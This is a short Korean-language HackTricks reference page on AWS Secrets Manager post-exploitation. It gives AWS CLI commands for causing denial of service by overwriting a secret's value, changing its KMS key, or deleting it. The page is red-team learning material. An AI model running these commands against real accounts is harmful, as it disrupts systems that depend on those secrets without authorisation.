AWS - Secrets Manager Post Exploitation

AWS 해킹을 배우고 실습하세요: HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹을 배우고 실습하세요: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

구독 요금제를 확인하세요!
💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
HackTricks 및 HackTricks Cloud 깃헙 레포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

Secrets Manager

더 많은 정보를 확인하려면:

AWS - Secrets Manager Enum

비밀 읽기

비밀 자체는 민감한 정보이며, 특권 상승 페이지를 확인하여 어떻게 읽을지 배우세요.

DoS 비밀 값 변경

비밀 값 변경으로 그 값에 의존하는 시스템 전체를 DoS할 수 있습니다.

이전 값도 저장되므로 이전 값으로 쉽게 돌아갈 수 있습니다.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS 변경 KMS 키

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS 시크릿 삭제

시크릿을 삭제하는 최소 일 수는 7일입니다.

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7

AWS 해킹 배우고 실습하기: HackTricks Training AWS Red Team Expert (ARTE) GCP 해킹 배우고 실습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

구독 요금제를 확인하세요!
💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
해킹 팁을 공유하려면 HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하세요.

PreviousAWS - S3 Post Exploitation NextAWS - SES Post Exploitation

Last updated 1 month ago